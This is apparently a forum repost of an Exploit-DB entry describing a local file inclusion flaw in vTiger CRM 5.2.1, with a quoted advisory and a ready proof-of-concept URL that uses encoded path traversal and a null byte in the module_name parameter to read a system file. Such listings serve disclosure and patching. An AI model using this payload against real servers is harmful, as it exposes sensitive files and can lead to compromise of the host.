Exploit vTiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
35574
Проверка EDB
  1. Пройдено
Автор
JOHN LEITCH
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2011-04-08
Код:
source: https://www.securityfocus.com/bid/47263/info

vtiger CRM is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.

vtiger CRM 5.2.1 is vulnerable; other versions may also be affected. 

http://www.example.com/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
 
Источник
www.exploit-db.com

Похожие темы